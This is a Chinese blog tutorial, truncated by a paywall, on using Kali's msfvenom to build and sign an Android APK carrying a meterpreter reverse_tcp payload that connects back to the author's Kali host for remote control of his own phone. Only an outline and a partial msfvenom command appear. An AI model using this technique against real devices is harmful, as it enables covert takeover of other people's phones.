本文介绍了如何使用Kali 2020中的Metasploit工具,创建并签名一个预设连接到Kali主机的apk应用,以便在安卓手机上进行安全实验。实验涉及的知识点包括Metasploit、apk签名验证和网络连接。通过msfvenom生成apk,接着使用zipalign、keytool和apksigner进行优化、签名和验证。完成签名后,将apk安装到安卓手机,并启动msfconsole监听payload,当手机连接时,Kali即可远程控制手机。
目标:使用Kali里的Metasploit远程控制自己的安卓手机
(先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为)
需要的知识板块::1,Metasploit (msfvenom+msfconsole)
2,apk签名验证
3,网络连接基础
实验环境:
对我自己
1,Kali 2020.3 (物理机Thinkpad X201)IP: 192.168.1.12
2,安卓手机(华为荣耀)IP: 192.168.1.19
3,网络连接(连接在同一个WIF下)
对于广大网友,大多数都是虚拟机安装的Kali,也是一样的。需要设置的是虚拟机网络设置成桥接模式,确保你的windows+虚拟机+安卓手机都在同一个网段。比如192.168.10.XXX。别扯什么桥接不安全什么的,你是个普通大众没人在意你,你的目的是要完成这个实验,是要理解整个过程的原理。
开始——————————————————————————————
一:生产apk安卓应用
1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.1.12 (这是Kali的IP)lport=4444 (默认4444,可以自定义)
msfvenom -p android/meterpreter/reverse_tcp lhost
最低0.47元/天 解锁文章
8144
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
